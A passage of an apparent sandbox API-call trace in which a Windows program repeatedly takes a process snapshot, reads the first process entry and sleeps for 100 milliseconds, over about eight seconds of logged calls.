th32ProcessID=0x0) returned 0x1a2c [0154.904] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0154.967] Sleep (dwMilliseconds=0x64) [0155.082] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0155.093] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.150] Sleep (dwMilliseconds=0x64) [0155.256] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0155.266] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.347] Sleep (dwMilliseconds=0x64) [0155.457] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0155.467] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.570] Sleep (dwMilliseconds=0x64) [0155.676] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0155.688] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.743] Sleep (dwMilliseconds=0x64) [0155.847] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0155.859] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0155.910] Sleep (dwMilliseconds=0x64) [0156.020] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0156.031] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.081] Sleep (dwMilliseconds=0x64) [0156.191] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0156.202] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.260] Sleep (dwMilliseconds=0x64) [0156.363] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0156.372] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.454] Sleep (dwMilliseconds=0x64) [0156.567] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0156.577] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.636] Sleep (dwMilliseconds=0x64) [0156.738] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0156.747] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.793] Sleep (dwMilliseconds=0x64) [0156.894] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0156.904] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0156.958] Sleep (dwMilliseconds=0x64) [0157.066] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0157.076] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.125] Sleep (dwMilliseconds=0x64) [0157.239] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0157.248] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.297] Sleep (dwMilliseconds=0x64) [0157.410] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0157.419] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.490] Sleep (dwMilliseconds=0x64) [0157.598] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0157.610] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.658] Sleep (dwMilliseconds=0x64) [0157.770] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0157.780] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.824] Sleep (dwMilliseconds=0x64) [0157.926] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0157.934] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0157.980] Sleep (dwMilliseconds=0x64) [0158.087] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0158.096] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.146] Sleep (dwMilliseconds=0x64) [0158.161] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0158.172] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.235] Sleep (dwMilliseconds=0x64) [0158.239] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0158.247] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.294] Sleep (dwMilliseconds=0x64) [0158.301] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0158.311] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.372] Sleep (dwMilliseconds=0x64) [0158.379] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0158.388] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.437] Sleep (dwMilliseconds=0x64) [0158.442] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0158.451] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.540] Sleep (dwMilliseconds=0x64) [0158.551] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0158.561] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.635] Sleep (dwMilliseconds=0x64) [0158.650] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0158.662] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.718] Sleep (dwMilliseconds=0x64) [0158.722] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0158.734] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.783] Sleep (dwMilliseconds=0x64) [0158.785] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0158.795] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.852] Sleep (dwMilliseconds=0x64) [0158.864] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0158.876] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.929] Sleep (dwMilliseconds=0x64) [0158.942] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0158.954] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0159.053] Sleep (dwMilliseconds=0x64) [0159.067] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0159.080] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0159.132] Sleep (dwMilliseconds=0x64) [0159.145] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0159.156] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0159.202] Sleep (dwMilliseconds=0x64) [0159.207] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0159.217] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0159.271] Sleep (dwMilliseconds=0x64) [0159.286] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0159.296] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0159.354] Sleep (dwMilliseconds=0x64) [0159.363] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0159.375] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0159.432] Sleep (dwMilliseconds=0x64) [0159.442] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0159.454] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0159.547] Sleep (dwMilliseconds=0x64) [0159.551] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0159.562] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0159.632] Sleep (dwMilliseconds=0x64) [0159.645] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0159.656] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0159.715] Sleep (dwMilliseconds=0x64) [0159.723] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0159.735] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0159.800] Sleep (dwMilliseconds=0x64) [0159.802] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0159.818] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0159.874] Sleep (dwMilliseconds=0x64) [0159.879] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0159.893] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0159.948] Sleep (dwMilliseconds=0x64) [0159.958] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0159.970] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0160.029] Sleep (dwMilliseconds=0x64) [0160.035] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0160.046] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0160.097] Sleep (dwMilliseconds=0x64) [0160.114] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0160.126] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0160.184] Sleep (dwMilliseconds=0x64) [0160.192] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0160.212] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0160.271] Sleep (dwMilliseconds=0x64) [0160.286] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0160.297] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0160.348] Sleep (dwMilliseconds=0x64) [0160.367] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0160.378] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0160.424] Sleep (dwMilliseconds=0x64) [0160.426] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0160.435] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0160.488] Sleep (dwMilliseconds=0x64) [0160.518] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0160.561] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0160.612] Sleep (dwMilliseconds=0x64) [0160.630] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0160.638] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0160.682] Sleep (dwMilliseconds=0x64) [0160.691] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0160.700] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0160.755] Sleep (dwMilliseconds=0x64) [0160.770] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0160.781] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0160.825] Sleep (dwMilliseconds=0x64) [0160.832] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0160.841] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0160.885] Sleep (dwMilliseconds=0x64) [0160.894] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0160.903] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0160.948] Sleep (dwMilliseconds=0x64) [0160.957] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0160.966] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0161.010] Sleep (dwMilliseconds=0x64) [0161.020] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0161.028] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0161.072] Sleep (dwMilliseconds=0x64) [0161.083] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0161.092] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0161.141] Sleep (dwMilliseconds=0x64) [0162.830] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0162.843] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.052] Sleep (dwMilliseconds=0x64) [0163.067] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1a2c [0163.080] Process32First (in: hSnapshot=0x1a2c, lppe=0x10d5fe20 | out: lppe=0x10d5fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0163.154] Sleep (dwMilliseconds=0x64) [0163.213] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) 